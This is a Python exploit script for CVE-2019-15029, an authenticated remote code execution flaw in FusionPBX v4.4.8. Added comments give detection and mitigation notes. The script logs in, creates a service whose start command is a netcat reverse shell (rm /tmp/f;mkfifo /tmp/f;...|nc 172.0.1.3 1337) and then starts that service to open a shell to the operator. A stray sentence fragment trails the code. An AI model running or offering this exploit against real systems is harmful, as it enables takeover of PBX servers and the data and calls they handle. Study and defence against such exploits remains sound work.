#!/usr/bin/python3 | |
''' | |
# Exploit Title: FusionPBX v4.4.8 authenticated Remote Code Execution | |
# Date: 13/08/2019 | |
# Exploit Author: Askar (@mohammadaskar2) | |
# CVE : 2019-15029 | |
# Vendor Homepage: https://www.fusionpbx.com | |
# Software link: https://www.fusionpbx.com/download | |
# Version: v4.4.8 | |
# Tested on: Ubuntu 18.04 / PHP 7.2 | |
''' | |
import requests | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
import sys | |
import warnings | |
from bs4 import BeautifulSoup | |
# Turn off BeautifulSoup and requests warnings.
# The second call hides urllib3's InsecureRequestWarning, which would otherwise
# be printed for every request below that passes verify=False.
# NOTE(review): with certificate verification off, the credentials this script
# posts are readable by anyone able to intercept the connection.
warnings.filterwarnings("ignore", category=UserWarning, module='bs4') | |
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
# Exactly five positional arguments are required (sys.argv[0] is the script
# name). On any other count, print the count and the usage text, then stop.
if len(sys.argv) != 6: | |
print(len(sys.argv)) | |
print("[~] Usage : ./FusionPBX-exploit.py url username password ip port") | |
print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337") | |
exit() | |
# Positional arguments, in the order given by the usage text.
# NOTE(review): the password arrives via argv, so it can end up in shell
# history and in process listings on the machine running the script.
url = sys.argv[1] | |
username = sys.argv[2] | |
password = sys.argv[3] | |
ip = sys.argv[4] | |
port = sys.argv[5] | |
# One requests session is used for every call below, presumably so that the
# cookie issued at login is sent with the later requests.
request = requests.session() | |
# Form fields for the login POST.
login_info = { | |
"username": username, | |
"password": password | |
} | |
# Log in by posting the credentials to the dashboard page. The exploit title
# says "authenticated": a valid account is a precondition.
login_request = request.post( | |
url+"/core/user_settings/user_dashboard.php", | |
login_info, verify=False | |
) | |
# Success is inferred from the response body only: the login counts as good
# when the error string is absent. Both branches just print a message.
if "Invalid Username and/or Password" not in login_request.text: | |
print("[+] Logged In Sucssfully") | |
else: | |
print("[+] Error with creds") | |
# Two pages of the services app are used: service_edit.php receives the form
# that saves a service, services.php is fetched afterwards to list services.
service_edit_page = url + "/app/services/service_edit.php" | |
services_page = url + "/app/services/services.php" | |
# Form body that creates a new service entry.
# As exercised by this script (CVE-2019-15029 per the header), the
# service_cmd_start field is stored as given and later run as a shell command
# line on the server when the service is started.
# Defender notes:
#  - Detection: a POST to /app/services/service_edit.php whose
#    service_cmd_start holds shell metacharacters (; | > &), unexpected rows
#    in the services list, and shell or nc processes spawned by the web
#    server user.
#  - Mitigation: move to a release that fixes CVE-2019-15029, limit which
#    accounts may create or edit services, and review existing service
#    definitions for commands nobody recognises.
payload_info = { | |
# Name under which the service is created; the listing is searched for it later.
"service_name":"PwnedService", | |
"service_type":"pid", | |
"service_data":"1", | |
# Command line stored as the service's start command (the author's sample
# value; it names a literal host and port and uses the FIFO /tmp/f).
"service_cmd_start":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/f", | |
"service_cmd_stop":"stop", | |
"service_description":"desc", | |
"submit":"Save" | |
} | |
# Save the service definition through the authenticated session.
request.post(service_edit_page, payload_info, verify=False) | |
# Fetch the services listing and parse it with the lxml parser.
html_page = request.get(services_page, verify=False) | |
soup = BeautifulSoup(html_page.text, "lxml") | |
# Walk every element that carries an href and look for the service name set
# in the form above; the id is whatever follows the first "=" in that href.
for a in soup.find_all(href=True): | |
if "PwnedService" in a: | |
sid = a["href"].split("=")[1] | |
break | |
# The start action is an ordinary GET with the id and a=start in the query
# string, so the request is visible in web-server access logs as
# /app/services/services.php?id=<id>&a=start, which is a useful thing to
# search for when investigating a host.
service_page = url + "/app/services/services.php?id=" + sid + "&a=start" | |
print("[+] Triggering the exploit , check your netcat !") | |
request.get(service_page, verify=False) |
Could you contact me on your